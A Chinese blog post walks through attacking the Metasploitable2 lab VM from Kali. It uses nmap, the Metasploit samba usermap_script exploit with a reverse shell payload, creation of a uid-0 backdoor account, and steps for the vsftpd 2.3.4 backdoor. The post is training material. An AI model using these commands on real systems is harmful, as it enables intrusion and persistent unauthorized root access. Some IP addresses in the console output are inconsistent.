MetaSploit渗透测试2-Metasploitable2-linux

最新推荐文章于 2025-06-10 19:37:24 发布
最新推荐文章于 2025-06-10 19:37:24 发布
阅读量1.1k 收藏 19
点赞数 6
CC 4.0 BY-SA版权
文章标签: linux 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2202_75658977/article/details/146359884

  1. Metasploitable2 它是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常 见漏洞攻击

  2. samba漏洞利用,获得shell
  3. 熟悉ssh工具的基本使用

  1. 搭建kali和Metasploitable2靶机环境

Kali:inet 192.168.6.129  netmask 255.255.255.0  broadcast 192.168.6.255

172.17.152.196 登录:msfadmin/msfadmin proot:sudo su root 密码:msfadmin

  1. 使用nmap扫码发现靶机,并使用msf6进行渗透测试

nmap -nsP 192.168.6.0/24

nmap -sV 192.168.11.128扫描该主机的全部端口,并查看对应端口的服务Service的版本 Version目标计算机是metasploitable2 445端口(Samba smbd 3.X - 4.X)可以作为目标利用

选择exploit路径: exploit/multi/samba/usermap_script 使用该exploit进行配置、渗透利用 msf5 > use exploit/multi/samba/usermap_script pmsf5 exploit(multi/samba/usermap_script) >

show payloads

选择 cmd/unix/reverse

msf6 payload(cmd/unix/reverse) > set rhost 172.17.152.196

rhost => 192.168.11.128

msf6 payload(cmd/unix/reverse) > set rport 445

rport => 445

msf6 payload(cmd/unix/reverse) > set lhost 192.168.6.129

lhost => 192.168.6.129

msf6 payload(cmd/unix/reverse) > show options

msf5 exploit(multi/samba/usermap_script) > exploit

成功

 实现目标Linux进入

  1. 使用meterpreter进行靶机利用:

(1)基本访问

(2)创建账号/密码

(3)在Windows使用ssh工具实现对靶机的ssh连接

whoami,查看当前用户角色 直接创建root账户xyz puseradd -u 0 -o -g root -G root -d /home/xyz xyz p设置xyz的密码为123 ppasswd xyz 完成后,可以用vim /etc/passwd 查看,或者重新登录使用xyz账户

尝试连接xyz/123,成功

(4)其它利用

一.Mysql

账号root  密码为空

二、Metasploitable2漏洞列表21端口Vsftpd2.3.4

特定版本的vsftpd服务器程序中,被人恶意植入代码,当用户名以“:)“为结尾,服务器就会在6200端口监听,并且能够执行任意代码。

扫描

通过nmap扫描查找到vsftpd2.3.4开启

  攻击

使用msfconsole工具调出metasploit

使用search 查找模块

使用use设置模块

使用show options查看需配置的参数

使用set设置需配置的参数

使用exploit进行攻击攻击成功获取到靶机的权限

ococ06
关注
Metasploitable2靶机渗透linux系统实操
以自己喜欢的方式过一生
11-07 1656
Metasploitable2靶机渗透linux系统实操
Metasploit渗透测试框架
qq_44237206的博客
05-16 643
Metasploit简介 Metasploit是一个渗透测试平台,使您能够查找,利用和验证漏洞。该平台包括Metasploit框架及其商业对手,如Metasploit Pro。 Metasploit是一个免费的、可下载的框架,通过它可以很容易对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了。仿佛一夜之间,任何人都可以成为黑客,每个人都可以使用攻击工具来攻击那些未打过补丁或者刚刚打过补..
metasploitable-linux-2.0.0.zip
09-01
metasploitable-linux,metasploitable-linuxmetasploitable-linux metasploitable-linux
Metasploitable: 2靶场渗透
最新发布
sucker的博客
06-10 721
渗透测试价值:Metasploitable 等靶机仍广泛用于教学,演示 从信息收集到提权 的完整链。此漏洞虽古老,但仍是理解后门漏洞原理的经典教材,实际环境中需确保无遗留 2.3.4 版本服务。4,分析目标系统的第一个暴露面,也是我们的攻击面,21端口存在的tp服务。漏洞本质:开发者故意植入或代码被篡改的后门,通过用户名中的特殊字符。后门漏洞 (CVE-2011-2523),允许未授权命令执行。6,尝试80端口的http服务漏洞利用getshell。Metasploit存在漏洞利用的模块,使用之。
metasploitable2
weixin_62915924的博客
04-29 544
这个靶机可以自己去网上下载,可以当做入门实战的一部分msfadmin msfadmin 账号密码nmap -sV -P0 IP 扫描服务 端口use exploit/multi/samba/usermap_script 一样。
metasploitable 2
YUKIDDDD的博客
08-05 1599
metasploitable 21.介绍2.信息收集3.漏洞利用 1.介绍 Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。版本2已经可以下载,并且比上一个版本包含更多可利用的安全漏洞。这个版本的虚拟系统兼容VMware,VirtualBox,和其他虚拟平台。默认只开启一个网络适配器并且开启NAT和Host-only,本镜像一定不要暴漏在一个易受攻击的网络中。 2.信息收集 nmap -sC -sV -p1-65535 192.168
Metasploitable2-Linux.zip_believable
01-08
Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。此文件是虚拟机镜像文件,可以直接在虚拟系统兼容的VMware,VirtualBox,和其他虚拟平台打开使用。默认只开启一个网络适配器并且开启NAT和Host-only,本镜像一定不要暴漏在一个易受攻击的网络中。
网络安全kali渗透学习 web渗透入门 Metasploit渗透测试框架介绍-Metasploitable2-Linux 靶机系统介绍
xueshenlaila的博客
02-28 2412
Metasploit是一个免费的、可下载的框架,通过它可以很容易对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了。仿佛一夜之间,任何人都可以成为黑客,每个人都可以使用攻击工具来攻击那些未打过补丁或者刚刚打过补丁的漏洞。软件厂商再也不能推迟发布针对已公布漏洞的补丁了,这是因为Metasploit团队一直都在努力开发各种攻击工具,并将它们贡献给所有Metasploit用户。
metasploitable-linux VMware镜像
03-09
安全测试靶机虚拟镜像,仅做安全测试学习使用
Kali linux渗透Metasploitable2-linux实现文件上传
qq_62657502的博客
08-30 585
Kali linux渗透Metasploitable2-linux实现文件上传
靶机渗透(五)——metasploitable2
qq_45751902的博客
04-29 8242
目录一、简介二、信息收集三、端口渗透6667-irc21弱口令 一、简介 metasploitable是一个Ubuntu-Linux虚拟机,用于测试常见漏洞。本质上是一个盒子中的渗透测试实验室,提供了执行渗透测试和渗透研究的安全场所。 靶机下载地址 用户名是 :msfadmin 密码是: msfadmin 二、信息收集 nmap -sS 192.168.92.0/24 开放了好多端口 三、端口渗透 启动msf msfconsole 6667-irc 登录msf search irc 找到对应得
Metasploitable-linux-2.0.0靶机配置教程
draper-crypto的博客
01-04 2971
metasploitable-linux-2.0.0配置
VMware安装Metasploitable2的过程解析
黄乔国PHP
05-15 496
Metasploitable2虚拟系统是一个特殊的ubuntu操作系统,本身设计目的是作为安全工具测试和演示常见漏洞攻击的环境。其中最核心是可以用来作为MSF攻击用的靶机。这样方便我们学习MSF框架的使用。并且开放了很多的高危端口如21、23、445等,而且具有很多未打补丁的高危漏洞, 如Samba MS-RPC Shell命令注入漏洞等,而且对外开放了很多服务,并且数据库允许外联等。系统中的用户口令均为弱口令。系统搭载了DVWA、Mutillidae等Web漏洞演练平台。对于学习有很大的帮助!
metasploitable2靶机
雨泽网络工作室
08-16 5523
一、Metasploitable2简介 Metasploitable2虚拟系统是一个特别制作的ubuntu操作系统,本身设计目的是作为安全工具测试和演示常见漏洞攻击的环境。其中最重要的是可以用来作为MSF攻击用的靶机。 开放了很多的高危端口如21、23、445等,而且具有很多未打补丁的高危漏洞, 如Samba MS-RPC Shell命令注入漏洞等,而且对外开放了很多服务,并且数据库允许外联等。系统中的用户口令均为弱口令。系统搭载了DVWA、Mutillidae等Web漏洞演练平台。 使用方法
端口服务信息收集&&靶机---Metasploitable2--linux安装使用
weixin_66202187的博客
12-28 1101
上默认安装了 Nmap,里面内置了大量的脚本,所以只需安装 Kail Linux 即可使用 Nmap。nc -vz ip 端口号--端口号(批量扫描)eg.. telnet 192.168.142.137 80。2.Metasploitable2 下载地址:https://sourceforge.net/projects/metasploitable/可以用python代码实现扫描 ---可以在网上搜一下具体过程。Nmap -sn IP/24(后面的24是子网掩码的位数 8/16/24)
看完这篇 教你玩转渗透测试靶机——Metasploitable2
weixin_54626591的博客
07-19 723
看完这篇 教你玩转渗透测试靶机——Metasploitable2
Kali linux 渗透测试(六)——Metasploitable2安装使用
Bulldozer_GD的博客
05-27 9060
Kali linux 渗透测试(六)——Metasploitable2安装使用 1.需要工具 VM虚拟机 Metasploitable2 下载地址:https://sourceforge.net/projects/metasploitable/ 2.安装步骤 1.下载完成后直接解压,用虚拟机直接打开文件 Metasploitable.vmx 2.默认的用户名是 :msfadmin 密码是: msfadmin 3.登陆成功后查看ip地址 4.在kali上(同一网段)输入地址,OK,接下来就可以练手了
用于安全测试学习的Metasploitable2 Linux虚拟镜像
资源摘要信息:"Metasploitable2-Linux是一个专门为安全研究人员和渗透测试人员设计的Linux虚拟机镜像。该镜像是一个故意存在许多安全漏洞的系统,目的是为了教学和练习目的,帮助安全从业者提高他们的技能。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值